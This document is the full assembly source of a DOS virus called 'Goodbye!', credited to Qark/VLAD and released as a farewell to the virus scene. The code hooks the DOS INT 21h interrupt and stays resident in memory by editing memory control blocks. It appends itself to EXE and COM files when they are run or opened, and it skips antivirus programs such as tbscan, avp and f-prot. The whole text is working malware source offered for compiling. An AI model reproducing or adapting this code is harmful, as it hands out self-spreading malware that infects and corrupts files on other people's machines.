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- ; Goodbye!
- ; by Qark/VLAD
- ;
- ; This virus is to say goodbye to all my friends in the virus scene.
- ;
- ;
- ; Infects EXE's and COM's, using CRC32 on any data comparisons.
- ;
- ; Ideas stolen from Zhengxi - but not the code!
- ;
- ; Compile with a86 as ever.
- ;
- org 0
- ;Below is stupid stuff
- sub ax,ax
- mov cx,ax
- dec ax
- sub ch,al
- mov dx,cx
- rol cx,1
- mov dl,al
- div cx
- div cx
- div cx
- div cx
- div cx
- dec cx
- add dx,ax
- div cx
- div cx
- div cx
- xchg dx,ax
- mov si,100h
- org $-2
- delta dw 100h
- mov ax,51bdh
- int 21h
- cmp ax,0bd51h
- je notvirus
- mov ax,ds
- add ax,dx
- mov ds,ax
- xor di,di
- cmp byte ptr [di],'Z'
- jne notvirus
- sub word ptr [di+3],(offset vmemsize /16)+2
- sub word ptr [di+12h],(offset vmemsize/16)+2
- ;Because so many people complained i've fixed my MCB code :)
- ;UMB's now survive..
- mov byte ptr [di],'M'
- add ax,word ptr [di+3]
- inc ax
- mov ds,ax
- mov byte ptr ds:[di],'Z'
- mov word ptr ds:[di+1],8
- mov word ptr ds:[di+3],(offset vmemsize/16)+1
- inc ax
- push es
- pop ds
- mov es,ax ;ax=es=virus segment
- cld
- push si
- mov cx,offset vpsize
- db 2eh ;cs:
- rep movsb
- push ds
- mov ds,cx ;ds=0
- mov es,ax
- mov si,21h*4
- mov di,offset i21
- movsw
- movsw
- mov word ptr [si-4],offset virushandler
- mov word ptr [si-2],ax
- pop ds
- push ds
- pop es
- pop si
- notvirus:
- push cs
- pop ds
- cmp si,16
- jb exefile
- mov di,101h
- mov ax,word ptr [si+orig5]
- mov word ptr [di-1],ax
- mov ax,word ptr [si+orig5+2]
- mov word ptr [di+1],ax
- mov al,byte ptr [si+orig5+4]
- mov byte ptr [di+3],al
- dec di
- xor ax,ax
- jmp di
- db "Goodbye everyone!",0dh,0ah
- db "Viruses were fun, but I've got other things I'd like to do",0dh,0ah
- db "Qark/VLAD",0dh,0ah
- exefile:
- mov ax,es
- add ax,10h
- add word ptr cs:[si+offset exejump+2],ax
- jmp $+2
- push es
- pop ds
- add ax,0
- org $-2
- origss dw 0
- mov ss,ax
- mov sp,0
- org $-2
- origsp dw 0
- xor ax,ax
- xor bx,bx
- xor cx,cx
- xor dx,dx
- xor si,si
- xor di,si
- db 0eah
- exejump dd 0
- virushandler:
- xchg ah,al
- cmp ax,0bd51h
- jne notres
- iret
- notres:
- cmp al,4bh
- je infect
- cmp al,3dh
- je infect
- cmp al,43h
- je infect
- out21:
- xchg ah,al
- db 0eah
- i21 dd 0
- infect:
- pushf
- push ax
- push bx
- push cx
- push dx
- push si
- push di
- push ds
- push es
- cld
- cmp ah,6ch
- je no6cchange
- mov si,dx
- no6cchange:
- push cs
- pop es
- mov di,offset filename
- mov ah,60h
- call int21h
- jnc goodname
- badname1:
- jmp badname
- goodname:
- push cs
- pop ds
- call check_name
- jc badname1
- mov dx,offset filename
- mov ax,3d02h
- call int21h
- jc badname1
- xchg bx,ax
- mov ah,3fh
- mov cx,18h
- mov dx,offset header
- call int21h
- mov si,offset header
- mov cx,2
- call crc16
- cmp ax,6bb5h ;MZ
- je infexe
- cmp ax,95fah ;ZM
- je infexe
- infcom:
- mov si,offset header
- mov cx,5
- call crc16
- or ax,ax
- jz badclose ;Infected!
- call lseekend
- or dx,dx
- jnz badclose
- cmp ax,64000
- ja badclose
- cmp ax,1001
- jb badclose
- push ax
- sub ax,3
- mov word ptr combyte+1,ax
- pop ax
- add ax,100h
- mov word ptr delta,ax
- mov ah,40h
- mov cx,offset vpsize
- xor dx,dx
- call int21h
- jc badclose
- call lseek0
- ;to mark infection, crc check the e9,xx,xx and put the crc
- ;after it, before writing to file.
- mov si,offset combyte
- mov cx,3
- call crc16
- mov word ptr combyte+3,ax
- mov ah,40h
- mov cx,5
- mov dx,offset combyte
- call int21h
- badclose:
- mov ah,3eh
- call int21h
- jmp badname
- infexe:
- mov si,offset header
- mov cx,14h
- call crc16
- or ax,ax
- jz badclose ;already infected
- cmp word ptr [si+18h],40h
- je badclose
- cmp word ptr [si+0ch],-1
- jne badclose
- mov ax,word ptr [si+0eh]
- mov word ptr origss,ax
- mov ax,word ptr [si+10h]
- mov word ptr origsp,ax
- mov ax,word ptr [si+14h]
- mov word ptr exejump,ax
- mov ax,word ptr [si+16h]
- mov word ptr exejump+2,ax
- call lseekend
- mov cx,16
- div cx
- sub ax,word ptr [si+8]
- mov word ptr [si+14h],dx
- mov word ptr [si+16h],ax
- mov word ptr delta,dx
- add dx,offset vmemsize
- and dx,0fffeh
- inc ax
- mov word ptr [si+0eh],ax
- mov word ptr [si+10h],dx
- mov ah,40h
- mov cx,offset vpsize
- xor dx,dx
- call int21h
- jc badclose
- call lseekend
- mov cx,512
- div cx
- or dx,dx
- jz nopagefix
- inc ax
- nopagefix:
- mov word ptr [si+4],ax
- mov word ptr [si+2],dx
- mov cx,12h
- call crc16
- mov word ptr [si+12h],ax
- call lseek0
- mov ah,40h
- mov cx,1ch
- mov dx,si
- call int21h
- jmp badclose
- badname:
- pop es
- pop ds
- pop di
- pop si
- pop dx
- pop cx
- pop bx
- pop ax
- popf
- jmp out21
- ;;;;---------->
- lseekend:
- mov ax,4202h
- jmp lseek
- lseek0:
- mov ax,4200h
- lseek:
- xor cx,cx
- cwd
- call int21h
- ret
- ;;;;---------->
- check_name:
- mov si,offset filename
- cmp byte ptr [si+2],'/' ;"CON" etc gives a reverse slash.
- je fail_name ;Will mess up my backslash checking
- ;if a program tries to open one.
- findstrend:
- lodsb
- cmp al,0
- jne findstrend
- dec si
- mov word ptr zpointer,si
- std
- findslend:
- lodsb
- cmp al,'\'
- jne findslend
- cld
- lodsw
- mov word ptr fpointer,si
- ;si points to file name name.ext hopefully
- mov cx,word ptr zpointer
- sub cx,si
- call crc16
- ;ax = crc value
- cmp ax,0bd8h ;tbscan.exe
- je fail_name
- cmp ax,0f07fh ;avp.exe
- je fail_name
- cmp ax,5e88h ;f-prot.exe
- je fail_name
- cmp ax,3cb2h ;scan.exe
- je fail_name
- cmp ax,86a5h ;dv.exe
- je fail_name
- cmp ax,0ba8eh ;progman.exe
- je fail_name
- mov si,word ptr zpointer
- cmp byte ptr [si-4],'.'
- jne fail_name
- sub si,3
- mov cx,3
- call crc16
- cmp ax,0e6ebh ;exe
- je pass_name
- cmp ax,0d105h ;com
- je pass_name
- jmp fail_name
- pass_name:
- clc
- ret
- fail_name:
- stc
- ret
- ;;;;---------->
- crc16 proc near
- ;on entry cx=number of bytes to checksum
- ; si=pointer to bytes
- ;on exit ax contains the checksum
- ;I stole this code from some PD sources I got off a BBS.
- push bx
- push cx
- push si
- push di
- call gentable
- xor ax,ax
- crc16loop:
- xor bh,bh
- mov bl,al
- lodsb
- xor bl,al
- shl bx,1
- mov bx,word ptr [bx+crc16tab]
- xor bl,ah
- mov ax,bx
- loop crc16loop
- pop di
- pop si
- pop cx
- pop bx
- ret
- crc16 endp
- ;;;;---------->
- Gentable proc near
- ;Generates the 16bit crc table.
- push ax
- push cx
- push dx
- push di
- mov di,offset crc16tab
- xor cx,cx
- outgen:
- xor ax,ax
- mov al,cl
- push cx
- mov cx,8
- calcloop:
- clc
- rcr ax,1
- jnc nocrcxor
- xor ax,0a001h
- nocrcxor:
- loop calcloop
- mov word ptr [di],ax
- inc di
- inc di
- pop cx
- inc cx
- cmp cx,100h
- jne outgen
- pop di
- pop dx
- pop cx
- pop ax
- ret
- Gentable endp
- ;;;;---------->
- int21h:
- pushf
- call dword ptr cs:i21
- ret
- ;;;;---------->
- combyte db 0e9h,0,0,0,0
- header:
- orig5 db 0cdh,20h,0,0,0
- vpsize:
- db 18h - 5 dup (0)
- zpointer dw 0 ;the offset of the end of the filename
- fpointer dw 0 ;the offset of the start of the filename
- filename db 128 dup (0)
- crc16tab db 100h*2 dup (0)
- vmemsize:
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